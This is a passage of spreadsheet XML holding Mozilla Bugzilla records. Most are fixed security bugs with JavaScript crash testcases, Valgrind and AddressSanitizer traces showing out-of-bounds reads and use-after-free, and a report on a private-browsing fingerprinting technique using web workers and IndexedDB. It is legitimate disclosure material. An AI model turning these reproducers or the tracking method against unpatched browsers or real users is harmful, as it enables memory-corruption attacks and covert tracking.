        <v>1</v>
      </c>
      <c r="G1880" t="n">
        <v>3</v>
      </c>
      <c r="H1880" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1880" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1880" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1880" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1880" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1880" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1880" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1880" t="inlineStr">
        <is>
          <t>[js:p1][sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1880" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1880" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1880" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1880" t="n">
        <v>1</v>
      </c>
      <c r="U1880" t="n">
        <v>0</v>
      </c>
      <c r="V1880" t="n">
        <v>22</v>
      </c>
      <c r="W1880" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision 3fa30b0edd15 (options -m -n -a), 32 bit opt build:
let ([] = 1) 3; 
let (i) new [i][print[i]];
Valgrind Errors:
==59269== Conditional jump or move depends on uninitialised value(s)
==59269==    at 0x80F970B: Decompile(SprintStack*, unsigned char*, int) (jsopcode.cpp:5077)
==59269==    by 0x81004DD: DecompileCode(JSPrinter*, JSScript*, unsigned char*, unsigned int, unsigned int) (jsopcode.cpp:5404)
==59269==    by 0x81006F0: DecompileExpression(JSContext*, JSScript*, JSFunction*, unsigned char*) (jsopcode.cpp:5810)
==59269==    by 0x81009C1: js_DecompileValueGenerator (jsopcode.cpp:5699)
==59269==    by 0x807E97C: js_ReportValueErrorFlags(JSContext*, unsigned int, unsigned int, int, JS::Value const&amp;, JSString*, char const*, char const*) (jsopcode.h:401)
==59269==    by 0x809A7BF: js_ReportIsNotFunction(JSContext*, JS::Value const*, unsigned int) (jsfun.cpp:1383)
==59269==    by 0x80CDAC5: js::InvokeConstructorKernel(JSContext*, js::CallArgs const&amp;) (jsinterp.cpp:605)
==59269==    by 0x80C1FF8: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2682)
==59269==    by 0x80CD563: js::RunScript(JSContext*, JSScript*, js::StackFrame*) (jsinterp.cpp:472)
==59269==    by 0x80CE129: js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) (jsinterp.cpp:670)
==59269==    by 0x806160C: JS_ExecuteScript (jsapi.cpp:5247)
==59269==    by 0x805030D: Process(JSContext*, JSObject*, char const*, bool) (js.cpp:478)
(twice)
==59269== Invalid read of size 1
==59269==    at 0x80F9700: Decompile(SprintStack*, unsigned char*, int) (jsopcode.cpp:5077)
==59269==    by 0x81004DD: DecompileCode(JSPrinter*, JSScript*, unsigned char*, unsigned int, unsigned int) (jsopcode.cpp:5404)
==59269==    by 0x81006F0: DecompileExpression(JSContext*, JSScript*, JSFunction*, unsigned char*) (jsopcode.cpp:5810)
==59269==    by 0x81009C1: js_DecompileValueGenerator (jsopcode.cpp:5699)
==59269==    by 0x807E97C: js_ReportValueErrorFlags(JSContext*, unsigned int, unsigned int, int, JS::Value const&amp;, JSString*, char const*, char const*) (jsopcode.h:401)
==59269==    by 0x809A7BF: js_ReportIsNotFunction(JSContext*, JS::Value const*, unsigned int) (jsfun.cpp:1383)
==59269==    by 0x80CDAC5: js::InvokeConstructorKernel(JSContext*, js::CallArgs const&amp;) (jsinterp.cpp:605)
==59269==    by 0x80C1FF8: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2682)
==59269==    by 0x80CD563: js::RunScript(JSContext*, JSScript*, js::StackFrame*) (jsinterp.cpp:472)
==59269==    by 0x80CE129: js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) (jsinterp.cpp:670)
==59269==    by 0x806160C: JS_ExecuteScript (jsapi.cpp:5247)
==59269==    by 0x805030D: Process(JSContext*, JSObject*, char const*, bool) (js.cpp:478)
==59269==  Address 0x6ba1a88 is 0 bytes after a block of size 64 alloc'd
==59269==    at 0x48D1876: malloc (vg_replace_malloc.c:236)
==59269==    by 0x80F3D5F: InitSprintStack(JSContext*, SprintStack*, JSPrinter*, unsigned int) (Utility.h:173)
==59269==    by 0x8100480: DecompileCode(JSPrinter*, JSScript*, unsigned char*, unsigned int, unsigned int) (jsopcode.cpp:5379)
==59269==    by 0x81006F0: DecompileExpression(JSContext*, JSScript*, JSFunction*, unsigned char*) (jsopcode.cpp:5810)
==59269==    by 0x81009C1: js_DecompileValueGenerator (jsopcode.cpp:5699)
==59269==    by 0x807E97C: js_ReportValueErrorFlags(JSContext*, unsigned int, unsigned int, int, JS::Value const&amp;, JSString*, char const*, char const*) (jsopcode.h:401)
==59269==    by 0x809A7BF: js_ReportIsNotFunction(JSContext*, JS::Value const*, unsigned int) (jsfun.cpp:1383)
==59269==    by 0x80CDAC5: js::InvokeConstructorKernel(JSContext*, js::CallArgs const&amp;) (jsinterp.cpp:605)
==59269==    by 0x80C1FF8: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2682)
==59269==    by 0x80CD563: js::RunScript(JSContext*, JSScript*, js::StackFrame*) (jsinterp.cpp:472)
==59269==    by 0x80CE129: js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) (jsinterp.cpp:670)
==59269==    by 0x806160C: JS_ExecuteScript (jsapi.cpp:5247)
The test does not always crash, but it has an 80-90% chance to do so. Marking s-s because this seems to be an out-of-bounds read. Assigned to luke for now, as he has been looking on this issue already (and provided the smaller/more reliable testcase :D).</t>
        </is>
      </c>
      <c r="X1880" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" t="n">
        <v>1410106</v>
      </c>
      <c r="B1881" t="inlineStr">
        <is>
          <t>2017-10-19 07:41:51 -0700</t>
        </is>
      </c>
      <c r="C1881" t="inlineStr">
        <is>
          <t>fingerprinting users in private window using web-worker + indexedDB</t>
        </is>
      </c>
      <c r="D1881" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:35 -0700</t>
        </is>
      </c>
      <c r="E1881" t="n">
        <v>1</v>
      </c>
      <c r="F1881" t="n">
        <v>1</v>
      </c>
      <c r="G1881" t="n">
        <v>2</v>
      </c>
      <c r="H1881" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1881" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1881" t="inlineStr">
        <is>
          <t>Private Browsing</t>
        </is>
      </c>
      <c r="K1881" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L1881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1881" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1881" t="inlineStr">
        <is>
          <t>[fingerprinting][adv-main57+][adv-esr52.5.1]</t>
        </is>
      </c>
      <c r="Q1881" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1881" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1881" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T1881" t="n">
        <v>0</v>
      </c>
      <c r="U1881" t="n">
        <v>0</v>
      </c>
      <c r="V1881" t="n">
        <v>48</v>
      </c>
      <c r="W1881" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36
Steps to reproduce:
It's possible to fingerprint users in private window by first-party and third-party scripts
1. Can be tracked even after browser restarts.
2. Can be tracked even after user clears Everything. (history / cookies / offline data )
Demo:
1. Visit the test page in normal window and private window:
https://cdn.cliqz.com/browser-f/fun-demo/test-webworker-indexed-db.html
It increments visit count, from inside the web-worker and on the page. Both using indexedDB as the storage.
Visit count this point should be 1. Meaning new unique visit.
2. Now restart the browser and visit the page again in both normal and private window.
It increments the counter to 2. Which means private-window behaviour is not as intended. The expectation is that the user is still treated as a new user.
Repeat the steps after selecting clearing everything in `clear recent history`, the counter still increments.
Actual results:
This is a serious bug, as it can be exploited for moving tracking from cookies to web-workers + indexedDB and have a persistent UUID. Which makes it possible to track a user irrespective of private window, across websites.
Also, as per the MDN documentation and this bug: https://bugzilla.mozilla.org/show_bug.cgi?id=781982 , private window should not have access to IndexedDB but as demonstrated web workers are able to use IndexedDB
Expected results:
1. Private window should not have access to IndexedDB even via web workers.
2. IndexedDB state should be cleaned after closing private window.
Although if the user has disabled `always` accept third-party cookies, the attack is only possible as a first-party, but even then I think private window should not allow tracking even from a first-party perspective.
Should also respect clear history / cookies / storage signal</t>
        </is>
      </c>
      <c r="X1881" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" t="n">
        <v>1791975</v>
      </c>
      <c r="B1882" t="inlineStr">
        <is>
          <t>2022-09-22 02:12:01 -0700</t>
        </is>
      </c>
      <c r="C1882" t="inlineStr">
        <is>
          <t>Segfault in js::gc::IsForwarded&lt;JSObject&gt; at 0xe5e5e5e5e5e5e5e5</t>
        </is>
      </c>
      <c r="D1882" t="inlineStr">
        <is>
          <t>2024-03-13 04:43:42 -0700</t>
        </is>
      </c>
      <c r="E1882" t="n">
        <v>1</v>
      </c>
      <c r="F1882" t="n">
        <v>1</v>
      </c>
      <c r="G1882" t="n">
        <v>3</v>
      </c>
      <c r="H1882" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1882" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1882" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1882" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1882" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1882" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q1882" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1882" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1882" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T1882" t="n">
        <v>1</v>
      </c>
      <c r="U1882" t="n">
        <v>0</v>
      </c>
      <c r="V1882" t="n">
        <v>23</v>
      </c>
      <c r="W1882" t="inlineStr">
        <is>
          <t>The following sample triggers a segmentation fault in debug builds from latest HEAD (it is not 100% reliable, but it works most of the time for me):
```
function main() {
let v2 = 0;
do {
    const v5 = this.gczeal(10,v2);
    const v6 = v2++;
} while (v2 &lt; 10);
for (let [v7] of "iV43r24wsw") {
    const v8 = v7 | 0;
    for (const v10 in "T4PnjCgpU2") {
        for (let v14 = 0; v14 &lt; 10; v14++) {
            try {
                const v16 = this.oomAtAllocation(v14);
                const v18 = Float64Array();
            } catch(v19) {
                const v20 = v7 in v19;
                for (let v23 = 1; v23 &lt; 64; v23++) {
                    const v25 = this.oomAtAllocation(v23);
                    try {
                        function v26(v27,v28) {
                        }
                        const v31 = this.newGlobal();
                        const v32 = Reflect.parse();
                        function v33(v34,v35) {
                        }
                    } catch(v36) {
                    }
                }
            }
        }
    }
    const v38 = v8 &gt;&gt; 25;
    const v39 = Math;
}
gc();
}
main();
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
```
Here's the stacktrace from gdb:
```
#0  0x0000555557317476 in std::__atomic_base&lt;unsigned long&gt;::load (this=0xe5e5e5e5e5e5e5e5, __m=std::memory_order_relaxed) at /usr/local/google/home/saelo/.mozbuild/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/atomic_base.h:396
#1  mozilla::detail::IntrinsicMemoryOps&lt;unsigned long, (mozilla::MemoryOrdering)0&gt;::load (aPtr=&lt;error reading variable: Cannot access memory at address 0xe5e5e5e5e5e5e5e5&gt;) at obj-debug/dist/include/mozilla/Atomics.h:195
#2  0x0000555557317405 in mozilla::detail::AtomicBaseIncDec&lt;unsigned long, (mozilla::MemoryOrdering)0&gt;::operator unsigned long (this=0xe5e5e5e5e5e5e5e5) at obj-debug/dist/include/mozilla/Atomics.h:340
#3  0x00005555575509e5 in js::gc::Cell::isForwarded (this=0xe5e5e5e5e5e5e5e5) at js/src/gc/Cell.h:145
#4  0x0000555557615405 in js::gc::IsForwarded&lt;JSObject&gt; (t=0xe5e5e5e5e5e5e5e5) at js/src/gc/Marking-inl.h:89
#5  0x00005555581838dc in js::CheckTracedThing&lt;JSObject&gt; (trc=0x7fffffff8038, thing=0xe5e5e5e5e5e5e5e5) at js/src/gc/Marking.cpp:153
#6  0x00005555573345e4 in js::gc::TraceEdgeInternal (trc=0x7fffffff8038, thingp=0x7fffffff7f40, Object=0x555555aa9e91 "baseshape_global") at js/src/gc/Tracer.h:105
#7  0x0000555557bba495 in js::TraceManuallyBarrieredEdge&lt;JSObject*&gt; (trc=0x7fffffff8038, thingp=0x7fffffff7f40, name=0x555555aa9e91 "baseshape_global") at js/src/gc/Tracer.h:247
#8  0x000055555812a763 in js::BaseShape::traceChildren (this=0x20afd0e9a058, trc=0x7fffffff8038) at js/src/gc/TraceMethods-inl.h:296
#9  0x0000555558109948 in UpdateCellPointers&lt;js::BaseShape&gt; (trc=0x7fffffff8038, cell=0x20afd0e9a058) at js/src/gc/Compacting.cpp:488
#10 0x0000555558108dcb in UpdateArenaPointersTyped&lt;js::BaseShape&gt; (trc=0x7fffffff8038, arena=0x20afd0e9a000) at js/src/gc/Compacting.cpp:494
#11 0x00005555581089f3 in UpdateArenaPointers (trc=0x7fffffff8038, arena=0x20afd0e9a000) at js/src/gc/Compacting.cpp:524
#12 0x00005555580ecba0 in UpdateArenaListSegmentPointers (gc=0x7ffff7718768, arenas=...) at js/src/gc/Compacting.cpp:548
#13 0x00005555580ec8e1 in js::gc::GCRuntime::updateCellPointers (this=0x7ffff7718768, zone=0x7ffff577b000, kinds=...) at js/src/gc/Compacting.cpp:687
#14 0x00005555580ecc46 in js::gc::GCRuntime::updateAllCellPointers (this=0x7ffff7718768, trc=0x7fffffff8880, zone=0x7ffff577b000) at js/src/gc/Compacting.cpp:755
#15 0x00005555580e9fec in js::gc::GCRuntime::updateZonePointersToRelocatedCells (this=0x7ffff7718768, zone=0x7ffff577b000) at js/src/gc/Compacting.cpp:796
#16 0x00005555580e97af in js::gc::GCRuntime::compactPhase (this=0x7ffff7718768, reason=JS::GCReason::DEBUG_GC, sliceBudget=..., session=...) at js/src/gc/Compacting.cpp:90
#17 0x00005555581017f8 in js::gc::GCRuntime::incrementalSlice (this=0x7ffff7718768, budget=..., reason=JS::GCReason::DEBUG_GC, budgetWasIncreased=false) at js/src/gc/GC.cpp:3381
#18 0x0000555558103845 in js::gc::GCRuntime::gcCycle (this=0x7ffff7718768, nonincrementalByAPI=false, budgetArg=..., reason=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:3842
#19 0x00005555581047d2 in js::gc::GCRuntime::collect (this=0x7ffff7718768, nonincrementalByAPI=false, budget=..., reason=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:4030
#20 0x0000555558106667 in js::gc::GCRuntime::runDebugGC (this=0x7ffff7718768) at js/src/gc/GC.cpp:4476
#21 0x00005555581351f3 in js::gc::GCRuntime::gcIfNeededAtAllocation (this=0x7ffff7718768, cx=0x7ffff772a100) at js/src/gc/Allocator.cpp:445
#22 0x000055555810f562 in js::gc::GCRuntime::checkAllocatorState&lt;(js::AllowGC)1&gt; (this=0x7ffff7718768, cx=0x7ffff772a100, kind=js::gc::AllocKind::OBJECT8_BACKGROUND) at js/src/gc/Allocator.cpp:409
#23 0x000055555810f465 in js::gc::detail::AllocateObject&lt;(js::AllowGC)1&gt; (cx=0x7ffff772a100, kind=js::gc::AllocKind::OBJECT8_BACKGROUND, nDynamicSlots=0, heap=js::gc::TenuredHeap, clasp=0x55555949e840 &lt;global_class&gt;, site=0x0) at js/src/gc/Allocator.cpp:67
#24 0x00005555574930d0 in js::gc::CellAllocator::NewCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, unsigned long const&amp;, js::gc::InitialHeap&amp;, JSClass const*&amp;, js::gc::AllocSite*&amp;&gt; (cx=0x7ffff772a100, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0) at js/src/gc/Allocator.h:123
#25 0x0000555557492211 in JSContext::newCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, unsigned long const&amp;, js::gc::InitialHeap&amp;, JSClass const*&amp;, js::gc::AllocSite*&amp;&gt; (this=0x7ffff772a100, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0, args=@0x7fffffff8fc0: 0x0) at js/src/vm/JSContext.h:267
#26 0x0000555557491be7 in js::NativeObject::create (cx=0x7ffff772a100, kind=js::gc::AllocKind::OBJECT8_BACKGROUND, heap=js::gc::TenuredHeap, shape=..., site=0x0) at js/src/vm/NativeObject-inl.h:444
#27 0x00005555577cff3b in NewObject (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, proto=..., kind=js::gc::AllocKind::OBJECT8_BACKGROUND, newKind=js::TenuredObject) at js/src/vm/JSObject.cpp:767
#28 0x00005555577cfb3b in js::NewObjectWithGivenTaggedProto (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, proto=..., allocKind=js::gc::AllocKind::OBJECT8, newKind=js::TenuredObject) at js/src/vm/JSObject.cpp:781
#29 0x00005555574aef74 in js::NewObjectWithGivenTaggedProto&lt;(js::NewObjectKind)1&gt; (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, proto=...) at js/src/vm/JSObject-inl.h:365
#30 0x00005555574aee37 in js::NewTenuredObjectWithGivenProto (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, proto=...) at js/src/vm/JSObject-inl.h:403
#31 0x000055555771e59c in js::GlobalObject::createInternal (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;) at js/src/vm/GlobalObject.cpp:546
#32 0x000055555771ed82 in js::GlobalObject::new_ (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, principals=0x0, hookOption=JS::DontFireOnNewGlobalHook, options=...) at js/src/vm/GlobalObject.cpp:619
#33 0x0000555557c94921 in JS_NewGlobalObject (cx=0x7ffff772a100, clasp=0x55555949e840 &lt;global_class&gt;, principals=0x0, hookOption=JS::DontFireOnNewGlobalHook, options=...) at js/src/jsapi.cpp:1744
#34 0x00005555572e1d4f in NewGlobalObject (cx=0x7ffff772a100, options=..., principals=0x0, kind=ShellGlobalKind::WindowProxy, immutablePrototype=true) at js/src/shell/js.cpp:10166
#35 0x00005555572f48e0 in NewGlobal (cx=0x7ffff772a100, argc=0, vp=0x7fffffff9a00) at js/src/shell/js.cpp:6596
```
0xe5e5e5e5e5e5e5e5 seems to be the "jemalloc freed memory" marker, so this may indicate a use-after-free issue. I'm therefore filing this as a security bug.</t>
        </is>
      </c>
      <c r="X1882" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" t="n">
        <v>542855</v>
      </c>
      <c r="B1883" t="inlineStr">
        <is>
          <t>2010-01-28 13:30:49 -0800</t>
        </is>
      </c>
      <c r="C1883" t="inlineStr">
        <is>
          <t>Need Socorro crash report processor python code to be refactored into a reusable library</t>
        </is>
      </c>
      <c r="D1883" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1883" t="n">
        <v>1</v>
      </c>
      <c r="F1883" t="n">
        <v>1</v>
      </c>
      <c r="G1883" t="n">
        <v>4</v>
      </c>
      <c r="H1883" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1883" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1883" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1883" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1883" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1883" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1883" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1883" t="inlineStr"/>
      <c r="Q1883" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1883" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1883" t="inlineStr">
        <is>
          <t>1.8</t>
        </is>
      </c>
      <c r="T1883" t="n">
        <v>1</v>
      </c>
      <c r="U1883" t="n">
        <v>0</v>
      </c>
      <c r="V1883" t="n">
        <v>12</v>
      </c>
      <c r="W1883" t="inlineStr">
        <is>
          <t>Per bug 532226, we now have a version of minidump stackwalk that can be started up once and listen for requests to process crash reports.  This is critical for the Hadoop cluster, but it could also potentially increase our crash report processing throughput with the existing Socorro infrastructure since it won't have to fork out a new process for every crash report.
I'd like to get the Socorro python code refactored a bit to make a set of simple methods that take care of the different parts of crash report processing (meta data processing, walker invocation, walker output processing).  Hopefully we can refactor the existing code to use these new APIs so that we'll have good code coverage for as long as the existing system is still in use.</t>
        </is>
      </c>
      <c r="X1883" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" t="n">
        <v>865537</v>
      </c>
      <c r="B1884" t="inlineStr">
        <is>
          <t>2013-04-24 20:04:28 -0700</t>
        </is>
      </c>
      <c r="C1884" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::HTMLMediaElement::LookupMediaElementURITable</t>
        </is>
      </c>
      <c r="D1884" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:22 -0700</t>
        </is>
      </c>
      <c r="E1884" t="n">
        <v>1</v>
      </c>
      <c r="F1884" t="n">
        <v>1</v>
      </c>
      <c r="G1884" t="n">
        <v>3</v>
      </c>
      <c r="H1884" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1884" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1884" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1884" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1884" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1884" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1884" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1884" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q1884" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1884" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1884" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T1884" t="n">
        <v>1</v>
      </c>
      <c r="U1884" t="n">
        <v>0</v>
      </c>
      <c r="V1884" t="n">
        <v>39</v>
      </c>
      <c r="W1884" t="inlineStr">
        <is>
          <t>Created attachment 741645
Testcase
Needs fuzzPriv extension to force gc. Let the testcase reload a couple of times and you should see a crash.
==29697== ERROR: AddressSanitizer: heap-use-after-free on address 0x6048007cc018 at pc 0x7f37966c651e bp 0x7fff45e783b0 sp 0x7fff45e783a8
READ of size 8 at 0x6048007cc018 thread T0
    #0 0x7f37966c651d in nsCOMPtr&lt;nsINodeInfo&gt;::get() const objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsCOMPtr.h:782
    #1 0x7f37966c618e in nsCOMPtr&lt;nsINodeInfo&gt;::operator-&gt;() const objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsCOMPtr.h:802
    #2 0x7f37966b2b78 in nsINode::NodePrincipal() const objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsINode.h:744
    #3 0x7f379a06126c in mozilla::dom::HTMLMediaElement::LookupMediaElementURITable(nsIURI*) content/html/content/src/HTMLMediaElement.cpp:1863
    #4 0x7f379a05a23e in mozilla::dom::HTMLMediaElement::LoadResource() content/html/content/src/HTMLMediaElement.cpp:1073
    #5 0x7f379a054443 in mozilla::dom::HTMLMediaElement::LoadFromSourceChildren() content/html/content/src/HTMLMediaElement.cpp:926
    #6 0x7f379a0add22 in mozilla::dom::nsSyncSection::Run() content/html/content/src/HTMLMediaElement.cpp:672
    #7 0x7f379fd84000 in nsBaseAppShell::RunSyncSectionsInternal(bool, unsigned int) widget/xpwidgets/nsBaseAppShell.cpp:352
    #8 0x7f379fd7feca in nsBaseAppShell::RunSyncSections(bool, unsigned int) widget/xpwidgets/nsBaseAppShell.h:89
    #9 0x7f379fd8576d in nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int) widget/xpwidgets/nsBaseAppShell.cpp:408
    #10 0x7f379fd859f1 in non-virtual thunk to nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int) widget/xpwidgets/nsBaseAppShell.cpp:410
    #11 0x7f37a4062218 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:640
    #12 0x7f37a3d0c532 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #13 0x7f37a096c8a9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #14 0x7f37a4378d1b in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #15 0x7f37a4378b6e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #16 0x7f37a4378a59 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #17 0x7f379fd801ae in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #18 0x7f379ea6da40 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:289
    #19 0x7f3794aadaeb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3878
    #20 0x7f3794ab31b0 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3945
    #21 0x7f3794ab5e75 in XRE_main toolkit/xre/nsAppRunner.cpp:4146
    #22 0x427c57 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:271
    #23 0x424e11 in main browser/app/nsBrowserApp.cpp:576
    #24 0x7f37b6ac576c in
    #25 0x424584 in
0x6048007cc018 is located 24 bytes inside of 472-byte region [0x6048007cc000,0x6048007cc1d8)
freed by thread T0 here:
    #0 0x4183f2 in __interceptor_free
    #1 0x7f37b483f6ce in moz_free memory/mozalloc/mozalloc.cpp:48
    #2 0x7f379a6e7cc9 in operator delete(void*) ../../../../dist/include/mozilla/mozalloc.h:225
    #3 0x7f379a6e7cc9 in mozilla::dom::HTMLVideoElement::~HTMLVideoElement() content/html/content/src/HTMLVideoElement.cpp:78
    #4 0x7f3798cef9c5 in nsNodeUtils::LastRelease(nsINode*) content/base/src/nsNodeUtils.cpp:258
    #5 0x7f3798f9a2fa in mozilla::dom::FragmentOrElement::Release() content/base/src/FragmentOrElement.cpp:1716
    #6 0x7f379a044d75 in mozilla::dom::HTMLMediaElement::Release() content/html/content/src/HTMLMediaElement.cpp:402
    #7 0x7f379a6e3c85 in mozilla::dom::HTMLVideoElement::Release() content/html/content/src/HTMLVideoElement.cpp:42
    #8 0x7f379dd4e4a0 in _ZL17DoDeferredReleaseIP11nsISupportsEvR8nsTArrayIT_E js/xpconnect/src/XPCJSRuntime.cpp:614
    #9 0x7f379dd4d971 in XPCJSRuntime::GCCallback(JSRuntime*, JSGCStatus) js/xpconnect/src/XPCJSRuntime.cpp:814
    #10 0x7f37ab9e702c in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:4611
    #11 0x7f37ab9d7924 in js::GC(JSRuntime*, js::JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:4628
